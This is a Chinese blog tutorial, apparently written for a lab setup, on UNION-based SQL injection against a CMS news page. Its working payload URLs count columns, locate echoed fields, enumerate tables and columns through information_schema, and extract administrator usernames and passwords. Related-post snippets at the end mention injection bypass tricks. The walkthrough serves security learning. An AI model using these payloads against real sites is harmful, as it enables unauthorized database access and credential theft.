[SQL注入] 联合查询

最新推荐文章于 2025-04-01 17:46:07 发布
最新推荐文章于 2025-04-01 17:46:07 发布
阅读量657 收藏 1
点赞数 2
分类专栏: SQL注入 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43586169/article/details/124624677
版权
本文详细介绍了如何通过数字行注入进行SQL注入攻击,包括测试注入点、确定查询列数、使用UNION查询、获取数据库信息、利用information_schema库查询表名和列名,最终揭示了如何获取数据库表中的特定数据。内容涵盖了SQL注入的基本流程和技术细节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

通过CMS新闻页面,获取后台管理员的账号密码

order by number:通过第几列进行排序

目录

1、测试有无注入点

2、进行拼串,确定查询数据的列数

3、使用UNION函数,进行联合查询

4、通过回显的列,进行利用

5、利用information_schema库,查数据库的表名

6、利用information_schema库,查指定数据库指定表的列名

7、利用information_schema库,查指定数据库指定表的列的数据

1、测试有无注入点

通过给参数输入一个错误的信息,发现这个是一个报错的,并且报错信息中,不包含我们输入的参数的数字,所以可以知道这个是一个数字行注入,不需要闭合符号

 

有注入点

2、进行拼串,确定查询数据的列数

发现注入点后,使用and进行拼串,发现可以成功

结合所学知识,可以判断出,这个函数的列数,使用的语句是order by number

 http://192.168.79.147/cms/show.php?id=33 order by 100

因为后面要使用UNION函数,进行两个查询语句的纵向拼接

UNION函数的条件是:列数相等,对应列的类型大致一样

 

根据上面的方法(二分查找法,测试出来),可以知道,这个查询出来的列数的15列

查询到16列,报错了

 

3、使用UNION函数,进行联合查询

当我们使用UNION函数进行联合查询的时候

由于前面的SQL语句我们可控的参数较少,一般不会让其进行输入,可以通过将其的ID参数进行一个错误的参数,就不会显示了

我们只是需要使用后面的语句就可以了

语句如下:http://192.168.79.147/cms/show.php?id=-33 UNION select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

通过下面的图片可以发现,这个回显的数据是3和11,可以知道,回显的是列数的查询的值

 

4、通过回显的列,进行利用

 http://192.168.79.147/cms/show.php?id=-33 UNION select 1,2,database(),4,5,6,7,8,9,10,version(),12,13,14,15

查看到当前服务器使用数据库的版本数据库名称

 

5、利用information_schema库,查数据库的表名

根据 4 的信息,已经知道使用的数据库的版本是5.5.53由于5.0以上版本有一个information_schema数据库,里面装载了数据库的基本信息

以及所有数据库的库名

所有数据库的表名

所有数据库的表的字段名

我们可以通过这个数据库,对整个表的信息进行查询

数据库收集的步骤为库名 - 表名 - 字段名 - 数据信息

  • 已知数据库的名字是cms

  • 查询数据库cms的表名

 http://192.168.79.147/cms/show.php
 ?id=-33 UNION select 1,2,database(),4,5,6,7,8,9,10,hex(table_name),12,13,14,15 from information_schema.tables

未做数据库过滤查询出来的表名

 

做数据库过滤查询出来的表名

 http://192.168.79.147/cms/show.php
 ?id=-33 UNION select 1,2,database(),4,5,6,7,8,9,10,hex(table_name),12,13,14,15 from information_schema.tables where table_schema = "cms"

 

  • 查询出cms数据库中,所有表名

    使用函数group_concat(table_name)将指定列的所有数据,通过逗号进行拼接

 http://192.168.79.147/cms/show.php
 ?id=-33 UNION select 1,2,database(),4,5,6,7,8,9,10,hex(group_concat(table_name)),12,13,14,15 from information_schema.tables where table_schema = "cms"

 

6、利用information_schema库,查指定数据库指定表的列名

使用group_concat(指定的列名):查询出指定列的所有数据,使用逗号隔开

 select 1,2,3,4,5,6,7,8,9,10,hex(group_concat(column_name)),12,13,14,15 from information_schema.columns where table_schema="cms" and table_name="cms_users"
 ​
 #从information_schema数据库的columns表中
 #当这个表中的table_schema字段等于cms,table_name字段等于cms_users时候
 #查询15列,查询出column_name列的所有数据,显示到11列

查询到字段是三个

获取到了cms_users表中的字段

7、利用information_schema库,查指定数据库指定表的列的数据

使用函数concat:将查询到的同一个表的两个字段,拼接在一起

 http://192.168.79.147/cms/show.php
 ?id=-33 UNION select 1,2,3,4,5,6,7,8,9,10,hex(concat(username,0x3a,password)),12,13,14,15 from cms_users limit 1,2

 #这里的limit 1,2是指:查询一个数据,从第二个开始,第一是0

 

 ​

拿到指定的数据

SQL注入联合查询
m0_56578216的博客
08-22 1128
适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句,该语句会同时执行两条select 语句,实现跨库、跨表查询。两条select 语句查询结果具有相同列数:对应的列数据类型相同(特殊情况下,条件被放松)。联合查询就是利用SQL语句中的union select语句同时执行两条select语句,实现跨表查询的方法。由于联合查询会将数据库中的两张表按照列数拼接(纵向拼接)后再进行查询,所以要求两条select语句查询的表必须******
sql注入之union联合查询注入
m0_52484587的博客
07-09 935
union联合、合并:将多条查询语句的结果合并成一个结果,union 注入攻击为一种手工测试注入思路:A:判断是否存在注入点http://xxxxxxxxx?id=11' 异常 1 and 1=1 返回结果和 id=1 一样1 and 1=2 异常从而则一定存在 SQL 注入漏洞B:order by 1-99 语句来查询该数据表的字段数C:利用获得的列数使用联合查询,union select 与前面的字段数一样找到了数据呈现的位置http://xxxxxxx?
【肾透测试笔记 --SQL注入篇_mysql
A98llen的博客
05-10 622
SQL注入篇_mysql写在前面MySQL中的注释一些函数注入之前1.有无回显2.判断类型3.有无布尔类型4.判断是否有延时一、联合查询1.判断列数2.判断显示位置3.修改数字4.窃取数据库->表->列->数据库名表名列名数据二、报错注入1.updatexml2.extractvalue...三、布尔盲注1.确定库名长度,按位测试2.确定表名长度,按位测试3.dump数据四、延时注入1.确定数据库名字长度,按位测试2.确定数据表名字长度,按位测试3.dump数据五、堆叠查询 写在前面 My
SQL注入--猜解数据表列数
YYYYU_ZHIZZZ的博客
04-28 269
sqli-labs练习SQL注入
从入门到精通【MySQL联合查询
最新发布
双吉堡工程专业的一名大二学生
04-01 1749
从入门到精通【MySQL联合查询
SQL注入联合查询注入
2201_75572825的博客
07-31 730
输入1asdf,即数字加上字符,若页面不报错,则为字符型,若报错,则为数字型因为页面无报错,则题目为字符型注入
SQL注入-联合查询
weixin_51706044的博客
02-05 2022
文章目录前言一、判断注入点还是整形或字符型二、判断列数三.找到显示位四.获取库名五.获取表名六.获取列名七.获取字段信息总结 前言 联合查询: 一:按照注入语法分为:联合查询注入Union/报错查询注入error/布尔型注入Boolean/延时注入Time/堆叠查询注入 二:联合查询注入是最简单的一种注入方式,但是要求页面必须有显示位.否则无法注入. 显示位:可以理解为从数据库提取的数据被显示在前端. 如果没有显示位,我们无法查看注入的结果. 三:联合查询一般步骤: 1、判断注入点还是整形或字符型 2、判
sql注入联合查询
03-26
</think>### SQL注入联合查询的原理与防护 #### 一、联合查询注入原理 1. **基础条件** 联合查询注入要求: - 原始查询结果列数需与`UNION SELECT`子句列数一致 - 目标页面具有**数据回显点**(如搜索结果页) ...
SQL注入联合查询的三个绕过技巧
qq_68163788的博客
01-26 3112
SQL注入中,可以利用科学计数法来绕过对输入的限制。例如,可以使用科学计数法来绕过对字符串长度的限制,通过将字符串拆分成多个部分并使用科学计数法来表示。此外,还可以利用数据库的特定特性或语法来替代原始的查询语句,从而执行联合查询或其他恶意操作。另外,还可以尝试利用无列名注入的技巧,通过在原始查询中使用通配符或其他方式来绕过对列名的限制,从而执行恶意操作。
SQL注入联合查询——ctf公开课笔记记录
m0_75196987的博客
04-18 591
SQL注入联合查询——来自 长空实验室ctf新兵训练营。Sqli-labs靶场搭建以及做题wp将由我亲自实践并为大家呈现。
SQL注入
輚至消亡
01-19 9225
0. PHPStorm代码调试方法 加上&XDEBUG_SESSION_START=PHPSTORM即可 1. 联合查询注入 利用前提: 页面上有显示位 优点: 方便快捷, 易于利用 缺点: 需要显示位 细分: 字符型注入 实践一下: 成功注入: 可以构造如下来判定是否存在字符型注入: 整型注入 实践一下: 成功 联合注入利用order by和group by判断表的列数 order by后面是可以接列号的,比如以第一列排序...
SQL注入UNION攻击,确定查询返回的列数定义目录标题
lindahhhjhhh的博客
09-07 745
知识点:方法2知识点。
(学习笔记)SQL注入--基础篇
peanut5036的博客
02-16 1383
SQL注入自学笔记,适合小白,包括union注入,报错注入,与盲注
SQL注入实例(sqli-labs/less-1)
Thewei666的博客
05-08 522
从网页可知传递的参数名为 id,并且为数字类型。
联合查询注入
weixin_30528371的博客
07-19 111
前提:页面必须有显示位select * from A union select * from B两个select必须有相同列且各列的数据类型也相同注入步骤:1、找注入点切得到闭合字符2、判断数据库类型3、猜解列数,得到显示位4、得到基本信息(如:数据库名、数据库版本、当前数据库名等)5、得到数据库名6、得到表名7、得到列名8、得到列值 其中最重要的是页面要有显示位,即爆出来的库信息能在页面上当作...
order by判断列数
m0_57514540的博客
02-03 500
order by注入
SQL注入的小知识
qq_52074678的博客
12-11 2540
登录数据库 mysql -u[用户名] -p[密码] 查看数据库 show databases; 使用某个数据库 use [数据库名]; 查看这个库里面有什么表 show tables; 查看table1表中所有的数据 select * from table1; union联合 select * from table1 where id<3 union select 1,2,3; 左边右边同时执行 select * from table1 where id<-3 union sele
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

源码code

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值